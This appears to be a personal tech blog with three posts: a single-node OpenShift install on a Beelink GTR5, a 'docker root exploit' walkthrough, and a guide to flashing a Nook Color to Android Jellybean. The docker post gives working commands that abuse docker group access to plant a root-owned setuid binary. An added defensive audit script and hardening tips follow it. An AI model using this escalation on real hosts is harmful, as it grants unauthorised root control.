Installing single-node OpenShift (SNO) on a bee-link GTR5

After working on the HP Chromebox G1, I discovered that a single 32 GB DDR3 SODIMM was going to cost 3 times what the Chromebox itself cost me to begin with.  It quickly became evident that my OpenShift experiment was going to be limited on the Chromebox, so I decided to try another PC I had available, a bee-link GTR5.  In addition to the internal SSD, I also added a 1 TB NVMe drive.

The Chromebox G1s might be possible to use as a microshift cluster, but I'm still waiting on the parts to really determine if that’s possible.

The GTR5 was previously used as a desktop machine running the i3 respin of Fedora.  First step was to back up everything and then off to the races with openshift.

I started out following this guide.

https://www.redhat.com/sysadmin/low-cost-openshift-cluster

Installation followed the guide pretty closely; I’m only going to note any special steps I did on my side.

I’m running a pretty simple consumer grade router, but it let me configure the DHCP hostname – I set the GTR5 as “hive.geolaw.loc” and used that in the cluster details.

Cluster Name: hive
Base Domain: geolaw.loc

Copied my ssh .pub and then generated the discovery iso.

DNS entries: like I said, I’ve got a cheap consumer class router, which does not support adding DNS entries.
So on the machines from which I plan on accessing the web GUI or ‘oc’, I plan on just using the following /etc/hosts entries:

$ grep hive /etc/hosts
192.166.29.7 api.hive.geolaw.loc *.apps.hive.geolaw.loc api-int.hive.geolaw.loc

Booting the discovery.iso

I had an existing Ventoy USB drive, and I first tried just dropping the iso file into the Ventoy partition – this did not boot properly for me and went to an emergency shell.  I then just used dd to write the discovery iso to the thumb drive:
$ sudo dd if=discovery_image_hive.iso of=/dev/sdb bs=1024

Once this finished I rebooted the GTR5 and from the UEFI level selected the USB to boot from.

After booting, the agent.service was failing due to it being unable to pull from the redhat.io registry:

Jun 22 14:26:26 hive podman[17680]: Error: initializing source docker://registry.redhat.io/rhai-tech-preview/assisted-installer-agent-rhel8:v1.0.0-264: unable to retrieve auth token: invalid username/password: unauthorized: Please login to the Red Hat Registry using your Customer Portal credentials. Further instructions can be found here: https://access.redhat.com/articles/3399531
Jun 22 14:26:29 hive podman[17749]: Trying to pull registry.redhat.io/rhai-tech-preview/assisted-installer-agent-rhel8:v1.0.0-264…

 

To fix this I ssh’d into the openshift installer, su’d to root, and then logged in to registry.redhat.io.  Once I logged in, I restarted the agent.service and away it went!

$ ssh core@hive
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
This is a host being installed by the OpenShift Assisted Installer.
It will be installed from scratch during the installation.

The primary service is agent.service. To watch its status, run:
sudo journalctl -u agent.service

To view the agent log, run:
sudo journalctl TAG=agent
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
Last login: Thu Jun 22 14:26:22 2023 from 192.168.29.16
[core@hive ~]$ sudo su -
Last login: Thu Jun 22 14:17:22 UTC 2023 on pts/0
[root@hive ~]# podman login registry.redhat.io
Authenticating with existing credentials for registry.redhat.io
Existing credentials are invalid, please enter valid username and password
Username (|uhc-pool-81ec5a21-635b-4c43-8409-63e45c46ad51): glaw@redhat.com
Password:
Login Succeeded!
[root@hive ~]# systemctl restart agent

The discovered host eventually popped up in the assisted installer and I was able to select my network and continue the install.

The host rebooted several times along the way as it was processing the install.

Watching the console I could see where it was pulling down the containers and starting them.

But again I was getting the registry errors, and the containers were going into an ImagePullBackOff state:

Jun 22 15:42:07 hive kubenswrapper[2978]: E0622 15:42:07.423504 2978 pod_workers.go:965] "Error syncing pod, skipping" err="failed to \"StartContainer\" for \"registry-server\" with ImagePullBackOff: \"Back-off pulling image \\\"registry.redhat.io/redhat/certified-operator-index:v4.13\\\"\"" pod="openshift-marketplace/certified-operators-bb2nx" podUID=0f76c0fa-cb11-436f-9e7e-77357117b313

I tried doing the podman register again, as root, as core, as containers .. no bueno 🙁

 

Oh well, good first test, will have to retry later.

Serious docker root exploit

I was amazed at how easy this was.  I found a couple of different websites that led me to this, giving credit where credit is due:

1. http://yatb.giacomodrago.com/en/post/10/shutdown-linux-system-from-within-php-script.html

2. http://reventlov.com/advisories/using-the-docker-command-to-root-the-host

So putting 1 and 2 together.  I have my docker install running as the “docker” user, so no “sudo” required.  All I did (as docker) is :

1. Create the following snippet of C code shutdown_setuid.c :
docker $> vi shutdown_setuid.c
#include <stdlib.h>
#include <unistd.h>

int main() {
setuid(0); /* only takes effect once the binary is root-owned with the setuid bit set */
system("/sbin/shutdown -h now"); /* change this to the actual location of shutdown */
return 0;
}

2. Compile it :
docker $> gcc -o shutdown_setuid shutdown_setuid.c

3. Exploit docker to mount the current directory and set shutdown_setuid to be owned as root and turn on the setuid permissions :
docker $> docker run -v $PWD:/stuff -t dockerdev/rhel /bin/bash -c 'chown root.root /stuff/shutdown_setuid && chmod a+s /stuff/shutdown_setuid'

4. docker $> ls -la shutdown_setuid
-rwsrwsr-x. 1 root root 6623 May 29 11:54 shutdown_setuid
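
Defender's view of the steps above, as an added example (not code from the original post): a POSIX shell audit that lists who is in the docker group, finds root-owned setuid/setgid files like the one in step 4, and checks whether a directory is mounted nosuid. The function names and the /home default are assumptions made for this example.

```sh
#!/bin/sh
# Added example: audit a host for the conditions the write-up above depends on.
# Function names and the /home default are assumptions, not from the post.

# Members of the docker group, read from group(5)-format lines on stdin
# (name:passwd:gid:user,user). Each one can drive the root-owned daemon.
docker_group_members() {
    awk -F: '$1 == "docker" && $4 != "" { gsub(",", "\n", $4); print $4 }'
}

# Regular files under DIR ($1) with the setuid or setgid bit; if OWNER ($2)
# is given, only files owned by that user (e.g. root, as in step 4 above).
find_setid_files() {
    if [ -n "${2:-}" ]; then
        find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -user "$2" -print
    else
        find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print
    fi
}

# Exit 0 if the exact mount point $1 carries the nosuid option, reading
# /proc/mounts-format lines on stdin. nosuid makes the kernel ignore
# setuid bits on that filesystem, so a planted binary runs unprivileged.
mount_is_nosuid() {
    awk -v mp="$1" '
        $2 == mp { n = split($4, opt, ","); for (i = 1; i <= n; i++) if (opt[i] == "nosuid") ok = 1 }
        END { exit ok ? 0 : 1 }'
}

# Run all three checks against the live system (DIR defaults to /home).
audit_host() {
    dir=${1:-/home}
    echo "== docker group members (root-equivalent) =="
    getent group docker | docker_group_members
    echo "== root-owned setuid/setgid files under $dir =="
    find_setid_files "$dir" root 2>/dev/null
    echo "== is $dir mounted nosuid? =="
    if mount_is_nosuid "$dir" < /proc/mounts; then echo yes; else echo no; fi
}

if [ "${1:-}" = "--audit" ]; then audit_host "${2:-/home}"; fi
```

Running the daemon with Docker's `userns-remap` option, or in rootless mode, maps container root to an unprivileged host UID, so step 3 cannot produce a file owned by host root.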

Turning your Nook Color into an Android 4.1 Jellybean tablet

Converting a nook color into a Jellybean 4.1 tablet.  I think it took me longer to write this up than to actually do it 🙂

Done on Linux Mint – bash commands are showing in bold italics

  1. grab a microsd card – they say that Sandisk brand, at least Class 4 works best.
    I have done this with both a 4GB and 8GB card, both worked, you can go larger – I am not sure if there is a max capacity supported by Android or the nook
  2. Download the boot image – http://forum.xda-developers.com/showthread.php?p=32921666#post32921666
    Look for the attachment to the main article – generic-sdcard-v1.3-CM7-9-10-larger-Rev5.zip
    I get a md5sum of : a2f15e48a5bb858db8ec02ccedbcb5b7
  3. glaw@mint:~$ mkdir nook && cd nook
  4. glaw@mint:~/nook$ wget http://download.cyanogenmod.com/get/jenkins/17892/cm-10-20130114-NIGHTLY-encore.zip  
  5. glaw@mint:~/nook$ wget http://goo.im/gapps/gapps-jb-20121011-signed.zip
  6. glaw@mint:~/nook$ md5sum cm*.zip gapp*.zip
    3cc2124c8f91e133ec28d438ccd5204f  cm-10-20130114-NIGHTLY-encore.zip
    4e9e7ec3c22b0b3471bd05d62b8a659d  gapps-jb-20121011-signed.zip
  7. glaw@mint:~/nook$ unzip generic-sdcard-v1.3-CM7-9-10-larger-Rev5.zip
    Archive:  generic-sdcard-v1.3-CM7-9-10-larger-Rev5.zip
      inflating: generic-sdcard-v1.3-CM7-9-10-larger-Rev5.img
  8. glaw@mint:~/nook$ sudo dd if=generic-sdcard-v1.3-CM7-9-10-larger-Rev5.img of=/dev/sde bs=1M
    [sudo] password for glaw: 
    298+1 records in
    298+1 records out
    312560640 bytes (313 MB) copied, 69.6386 s, 4.5 MB/s
  9. eject the card and reinsert – I just disconnected my card reader and reconnected
  10. Mount the sd card – this is a 300 MB vfat partition

    glaw@mint:~/nook$ sudo mount /dev/sde1 /mnt
    glaw@mint:~/nook$ ls -la /mnt

    total 8112
    drwxr-xr-x  2 root root    4096 Dec 31  1969 .
    drwxr-xr-x 27 root root    4096 Jan 18 00:13 ..
    -rwxr-xr-x  1 root root   14504 Feb 15  2011 MLO
    -rwxr-xr-x  1 root root  289328 May 29  2011 u-boot.bin
    -rwxr-xr-x  1 root root 2756116 May 14  2011 uImage
    -rwxr-xr-x  1 root root 5234466 Oct 17 19:41 uRamdisk
  11. glaw@mint:~/nook$ sudo cp cm*.zip gapp*.zip /mnt
    glaw@mint:~/nook$ ls -la /mnt

    total 253116
    drwxr-xr-x  2 root root      4096 Dec 31  1969 .
    drwxr-xr-x 27 root root      4096 Jan 18 00:13 ..
    -rwxr-xr-x  1 root root 158172246 Jan 19 10:14 cm-10-20130114-NIGHTLY-encore.zip
    -rwxr-xr-x  1 root root  92706064 Jan 19 10:15 gapps-jb-20121011-signed.zip
    -rwxr-xr-x  1 root root     14504 Feb 15  2011 MLO
    -rwxr-xr-x  1 root root    289328 May 29  2011 u-boot.bin
    -rwxr-xr-x  1 root root   2756116 May 14  2011 uImage
    -rwxr-xr-x  1 root root   5234466 Oct 17 19:41 uRamdisk
  12. glaw@mint:~/nook$ sudo umount /mnt
  13. eject the card,
  14. With the nook powered off, insert into the nook’s microsd slot and then power on.  Sit back and relax for 4 and a half minutes :
    http://www.youtube.com/watch?v=Bsipwz3pk3I
  15. repower on the nook and welcome to Android Jellybean.
    http://www.youtube.com/watch?v=3vaO3W6HJU4